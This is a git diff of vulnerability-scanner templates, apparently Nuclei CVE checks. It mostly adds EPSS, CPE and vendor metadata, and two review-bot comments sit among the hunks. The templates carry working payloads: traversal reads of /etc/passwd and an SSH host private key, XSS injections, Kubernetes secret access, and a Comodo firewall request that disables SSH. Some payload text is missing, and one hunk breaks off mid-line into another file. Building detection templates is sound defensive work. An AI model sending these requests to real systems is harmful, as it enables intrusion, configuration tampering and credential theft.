CVE-2018-16167 cwe-id: CWE-78 - tags: rce,oast,edb,cve,cve2018,logontracer + epss-score: 0.13203 + cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jpcert + product: logontracer + tags: rce,oast,edb,cve,cve2018,logontracer,intrusive http: - raw: @@ -33,4 +37,4 @@ http: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" + - http diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index a941e3071e..4cd6f85204 100644 
--- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -10,14 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - https://github.com/springjk/wordpress-wechat-broadcast/issues/14 - http://seclists.org/fulldisclosure/2018/Sep/32 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/150202 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 - tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi + epss-score: 0.20198 + cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: wechat_brodcast_project + product: wechat_brodcast + tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi http: - method: GET @@ -26,6 +32,6 @@ http: matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index be533e9995..27494001c1 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -15,9 +15,13 @@ info: cvss-score: 8.6 cve-id: CVE-2018-16288 cwe-id: CWE-200 - tags: cve,cve2018,lfi,supersign,edb + epss-score: 0.1824 + cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: lg + product: supersign_cms + tags: cve,cve2018,lfi,supersign,edb http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index e9aad13aea..c42451709f 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml 
@@ -16,9 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2018-16299 cwe-id: CWE-22 - tags: wordpress,lfi,plugin,wp,edb,packetstorm,cve,cve2018 + epss-score: 0.11104 + cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: localize_my_post_project + product: localize_my_post + tags: wordpress,lfi,plugin,wp,edb,packetstorm,cve,cve2018 http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index 1387eb8922..95b5a0cd96 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -15,11 +15,13 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16668 cwe-id: CWE-287 + epss-score: 0.00374 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* - epss-score: 0.00376 - tags: cve,cve2018,circarlife,scada,iot,disclosure,edb metadata: max-request: 1 + vendor: circontrol + product: circarlife_scada + tags: cve,cve2018,circarlife,scada,iot,disclosure,edb http: - method: GET @@ -32,6 +34,7 @@ http: part: header words: - "CirCarLife Scada" + - type: word part: body words: diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index e9c394de7b..e0ed2229df 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -15,9 +15,13 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16670 cwe-id: CWE-287 - tags: scada,plc,iot,disclosure,edb,cve,cve2018,circarlife + epss-score: 0.00199 + cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: circontrol + product: circarlife_scada + tags: scada,plc,iot,disclosure,edb,cve,cve2018,circarlife http: - method: GET @@ -30,6 +34,7 @@ http: part: header words: - "CirCarLife Scada" + - type: word part: body words: 
diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 710adc6fe7..004e7f3e11 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -14,9 +14,13 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16671 cwe-id: CWE-200 - tags: iot,disclosure,edb,cve,cve2018,circarlife,scada + epss-score: 0.0038 + cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: "circontrol" + product: circarlife_scada + tags: iot,disclosure,edb,cve,cve2018,circarlife,scada http: - method: GET @@ -29,10 +33,12 @@ http: part: header words: - "CirCarLife Scada" + - type: word part: body words: - "circontrol" + - type: regex part: body regex: diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index b1f598c0ff..8b3b0cc0cc 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -13,9 +13,13 @@ info: cvss-score: 9.1 cve-id: CVE-2018-16716 cwe-id: CWE-22 - tags: cve,cve2018,ncbi,lfi + epss-score: 0.00581 + cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nih + product: ncbi_toolbox + tags: cve,cve2018,ncbi,lfi http: - method: GET diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index b7f1b5b726..9da9921dbc 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-16761 cwe-id: CWE-601 - tags: cve,cve2018,redirect,eventum,oss + epss-score: 0.00068 + cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: eventum_project + product: eventum + tags: cve,cve2018,redirect,eventum,oss http: - method: GET diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 8e24b573a8..01478c8d80 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml 
@@ -10,16 +10,19 @@ info: - https://www.getfuelcms.com/ - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 - https://nvd.nist.gov/vuln/detail/CVE-2018-16763 + - https://github.com/daylightstudio/FUEL-CMS/issues/478 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16763 cwe-id: CWE-74 + epss-score: 0.75214 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* - epss-score: 0.88022 - tags: cve,cve2018,fuelcms,rce,edb metadata: max-request: 1 + vendor: thedaylightstudio + product: fuel_cms + tags: cve,cve2018,fuelcms,rce,edb http: - raw: @@ -29,9 +32,10 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index b7a53f58e4..0f3c6a6bb1 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -15,11 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16836 cwe-id: CWE-22 + epss-score: 0.2221 cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:* - epss-score: 0.25354 - tags: cve,cve2018,rubedo,lfi,edb metadata: max-request: 1 + vendor: rubedo_project + product: rubedo + tags: cve,cve2018,rubedo,lfi,edb http: - method: GET diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index 425266104f..2b47330554 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -14,9 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-16979 cwe-id: CWE-113 + epss-score: 0.00118 + cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: monstra + product: monstra tags: cve,cve2018,crlf,mostra,mostracms,cms http: diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 1c6e950de4..e41720066b 100644 --- a/http/cves/2018/CVE-2018-17246.yaml 
+++ b/http/cves/2018/CVE-2018-17246.yaml @@ -10,14 +10,19 @@ info: - https://www.elastic.co/community/security - https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594 - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 + - https://access.redhat.com/errata/RHBA-2018:3743 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17246 - cwe-id: CWE-829 - tags: cve,cve2018,lfi,kibana,vulhub + cwe-id: CWE-829,CWE-73 + epss-score: 0.96913 + cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: elastic + product: "kibana" + tags: cve,cve2018,lfi,kibana,vulhub http: - method: GET @@ -36,8 +41,8 @@ http: words: - "kbn-name" - "kibana" - condition: or case-insensitive: true + condition: or - type: word part: header diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index 25beccfb9e..de7ddf8978 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -14,11 +14,14 @@ info: cvss-score: 9.8 cve-id: CVE-2018-17254 cwe-id: CWE-89 - cpe: cpe:2.3:a:arkextensions:jck_editor:*:*:*:*:*:*:*:* - epss-score: 0.8697 - tags: cve,cve2018,packetstorm,edb,joomla,sqli + epss-score: 0.83749 + cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* metadata: max-request: 1 + framework: joomla\! + vendor: arkextensions + product: jck_editor + tags: cve,cve2018,packetstorm,edb,joomla,sqli http: - raw: diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index d0e250be5d..26a3a062a0 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -14,10 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-17422 cwe-id: CWE-601 + epss-score: 0.00118 + cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true shodan-query: http.title:"dotCMS" + vendor: dotcms + product: dotcms tags: cve,cve2018,redirect,dotcms http: 
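Review bot: `product: "kibana"` is double-quoted while `vendor: elastic` on the line above and every other `vendor`/`product` pair added in this commit are plain scalars; the quotes change nothing for a plain word, so drop them for consistency, `product: kibana`. The same nit applies to `vendor: "circontrol"` in the CVE-2018-16671 template of this commit.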
diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 54d8394314..677e087c3c 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -10,16 +10,19 @@ info: - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 - https://nvd.nist.gov/vuln/detail/CVE-2018-17431 - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437 + - https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17431 cwe-id: CWE-287 + epss-score: 0.10458 cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* - epss-score: 0.09083 - tags: cve2018,comodo,rce,edb,cve metadata: max-request: 2 + vendor: comodo + product: unified_threat_management_firewall + tags: cve2018,comodo,rce,edb,cve http: - raw: @@ -27,7 +30,6 @@ http: GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1 Host: {{Hostname}} Connection: close - - | # to triggering RCE GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1 Host: {{Hostname}} @@ -36,9 +38,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "Configuration has been altered" - part: body + - type: status status: - 200 diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 159dd06c56..0e5c1d8340 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml 
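Review bot: The tags line rewritten in this hunk (`tags: cve2018,comodo,rce,edb,cve`) is missing `intrusive`: the first raw request's `k=` parameter URL-decodes to `service\nssh\ndisable\n`, i.e. it alters the firewall's configuration by disabling the SSH service, and the body matcher itself keys on `Configuration has been altered`. Sibling hunks in this same commit add `intrusive` to templates that merely run `whoami`, so this omission stands out; change the line to `tags: cve2018,comodo,rce,edb,cve,intrusive`. The `# to triggering RCE` comment on the second request would also read better as `# trigger the RCE (previous request already changed the device config)` so operators see the side effect before running it.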
@@ -4,8 +4,7 @@ info: name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting author: nadino severity: medium - description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php - request to wp-admin/admin.php. + description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. reference: - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ - https://nvd.nist.gov/vuln/detail/CVE-2018-18069 @@ -14,9 +13,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18069 cwe-id: CWE-79 - tags: cve,cve2018,wordpress,xss,plugin + epss-score: 0.00106 + cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: wpml + product: wpml + tags: cve,cve2018,wordpress,xss,plugin http: - method: POST @@ -25,7 +29,6 @@ http: body: | icl_post_action=save_theme_localization&locale_file_name_en=EN"> - host-redirects: true max-redirects: 2 matchers: diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 40cc4c03d8..37d75235b8 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml 
@@ -11,14 +11,19 @@ info: - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/ - https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI - https://nvd.nist.gov/vuln/detail/CVE-2018-18264 + - https://github.com/kubernetes/dashboard/pull/3400 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-18264 cwe-id: CWE-306 + epss-score: 0.97406 + cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: product:"Kubernetes" + vendor: kubernetes + product: dashboard tags: cve,cve2018,kubernetes,k8s,auth-bypass http: @@ -28,9 +33,9 @@ http: - "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" stop-at-first-match: true + matchers-condition: and matchers: - - type: dsl dsl: - 'contains(body, "apiVersion") && contains(body, "objectRef")' diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index 2a494d6667..f50f23dafc 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -16,9 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18323 cwe-id: CWE-22 - tags: cve,cve2018,centos,lfi,packetstorm + epss-score: 0.97376 + cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: control-webpanel + product: webpanel + tags: cve,cve2018,centos,lfi,packetstorm http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 74bb9411c9..e062649078 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml 
@@ -13,9 +13,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18570 cwe-id: CWE-79 - tags: xss,cve,cve2018,planon + epss-score: 0.00098 + cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: planonsoftware + product: planon + tags: xss,cve,cve2018,planon http: - method: GET @@ -24,16 +28,16 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index ce6da1839e..63da2f3809 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -15,10 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18608 cwe-id: CWE-79 + epss-score: 0.00177 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"DedeCms" verified: true + vendor: dedecms + product: dedecms tags: dedecms,xss,cve,cve2018 http: diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 39dce74401..705ad23980 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml 
@@ -14,26 +14,31 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18775 cwe-id: CWE-79 - tags: cve2018,microstrategy,xss,edb,packetstorm,cve + epss-score: 0.00235 + cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microstrategy + product: microstrategy_web + tags: cve2018,microstrategy,xss,edb,packetstorm,cve,intrusive http: - method: GET path: - - '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C' + - "{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C" + matchers-condition: and matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - text/html + - type: status status: - 200 - - - type: word - words: - - '">' - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index b2d3a71d76..ff0ed1585f 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -15,9 +15,13 @@ info: cvss-score: 4.3 cve-id: CVE-2018-18777 cwe-id: CWE-22 - tags: traversal,edb,packetstorm,cve,cve2018,microstrategy,lfi + epss-score: 0.00238 + cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microstrategy + product: microstrategy_web + tags: traversal,edb,packetstorm,cve,cve2018,microstrategy,lfi http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index af34e6fabd..4ef63598c2 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml 
@@ -14,9 +14,13 @@ info: cvss-score: 6.5 cve-id: CVE-2018-18778 cwe-id: CWE-200 - tags: cve,cve2018,lfi,mini_httpd + epss-score: 0.95125 + cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: acme + product: mini-httpd + tags: cve,cve2018,lfi,mini_httpd http: - raw: @@ -25,12 +29,13 @@ http: Host: unsafe: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index f2b0c25463..3e96ad2338 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -16,9 +16,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-18925 cwe-id: CWE-384 - tags: gogs,lfi,rce,vulhub,cve,cve2018 + epss-score: 0.12213 + cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: gogs + product: gogs + tags: gogs,lfi,rce,vulhub,cve,cve2018 http: - raw: @@ -26,7 +30,6 @@ http: GET / HTTP/1.1 Host: {{Hostname}} Cookie: lang=en-US; i_like_gogits=../../../../etc/passwd; - - | GET / HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index c58f78f2d2..c6d9204ebd 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19136 cwe-id: CWE-79 + epss-score: 0.00351 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: domainmod + product: domainmod tags: edb,cve,cve2018,domainmod,xss,authenticated http: @@ -28,12 +32,12 @@ http: Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - - | GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word 
diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index e496c6dd19..956c1f0a92 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -14,9 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19137 cwe-id: CWE-79 + epss-score: 0.0008 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: domainmod + product: domainmod tags: cve,cve2018,domainmod,xss,authenticated http: @@ -27,12 +31,12 @@ http: Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - - | GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 8a080ead9a..1c96a75b15 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -11,14 +11,20 @@ info: - https://wordpress.org/plugins/ninja-forms/ - https://www.exploit-db.com/exploits/45880 - https://nvd.nist.gov/vuln/detail/CVE-2018-19287 + - https://plugins.trac.wordpress.org/changeset/1974335/ninja-forms/trunk/includes/Admin/Menus/Submissions.php classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-19287 cwe-id: CWE-79 + epss-score: 0.82305 + cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true + framework: wordpress + vendor: ninjaforma + product: ninja_forms tags: wp-plugin,wp,xss,authenticated,wpscan,edb,cve,cve2018,ninja-forms,wordpress http: @@ -29,13 +35,13 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="> ]> 
@@ -36,9 +37,11 @@ http: &ent; + headers: + Content-Type: "text/xml" + matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index bc21d656ef..ab5e3450bb 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -16,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-12054 cwe-id: CWE-79 - cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:*:*:* epss-score: 0.00129 - tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020 + cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: catchplugins + product: catch_breadcrumb + tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020 http: - method: GET @@ -30,10 +33,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - "catch-breadcrumb" - part: body condition: and - type: word diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index 9709ffb49d..31381df569 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -9,16 +9,19 @@ info: - https://github.com/BeetleChunks/CVE-2020-12116 - https://nvd.nist.gov/vuln/detail/CVE-2020-12116 - https://www.manageengine.com/network-monitoring/help/read-me-complete.html + - https://www.manageengine.com/network-monitoring/help/read-me-complete.html#125125 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-12116 cwe-id: CWE-22 + epss-score: 0.97344 cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* - epss-score: 0.97327 - tags: cve,cve2020,zoho,lfi,manageengine metadata: max-request: 2 + vendor: zohocorp + product: manageengine_opmanager + tags: cve,cve2020,zoho,lfi,manageengine http: - raw: 
@@ -27,7 +30,6 @@ http: Host: {{Hostname}} Accept: */* Connection: close - - | GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1 Host: {{Hostname}} @@ -36,14 +38,6 @@ http: Connection: close Referer: http://{{Hostname}} - extractors: - - type: regex - name: endpoint - part: body - internal: true - regex: - - "(?m)/cachestart/.*/jquery/" - req-condition: true matchers: - type: dsl @@ -51,3 +45,11 @@ http: - 'contains(body_2, "BEGIN RSA PRIVATE KEY")' - 'status_code_2 == 200' condition: and + + extractors: + - type: regex + name: endpoint + regex: + - "(?m)/cachestart/.*/jquery/" + internal: true + part: body diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index 64b6dba466..1cb30db2de 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -15,11 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12127 cwe-id: CWE-306 - epss-score: 0.0509 + epss-score: 0.03579 + cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"Wavlink" verified: true + vendor: wavlink + product: wn530h4_firmware tags: cve,cve2020,wavlink,exposure http: diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml index ef059ff2d5..040710c4f2 100644 --- a/http/cves/2020/CVE-2020-12447.yaml +++ b/http/cves/2020/CVE-2020-12447.yaml @@ -15,9 +15,12 @@ info: cve-id: CVE-2020-12447 cwe-id: CWE-22 epss-score: 0.01261 - tags: cve,cve2020,onkyo,lfi,traversal + cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: onkyo + product: tx-nr585_firmware + tags: cve,cve2020,onkyo,lfi,traversal http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index 9cfc35491a..ffe9abc9d7 100644 --- 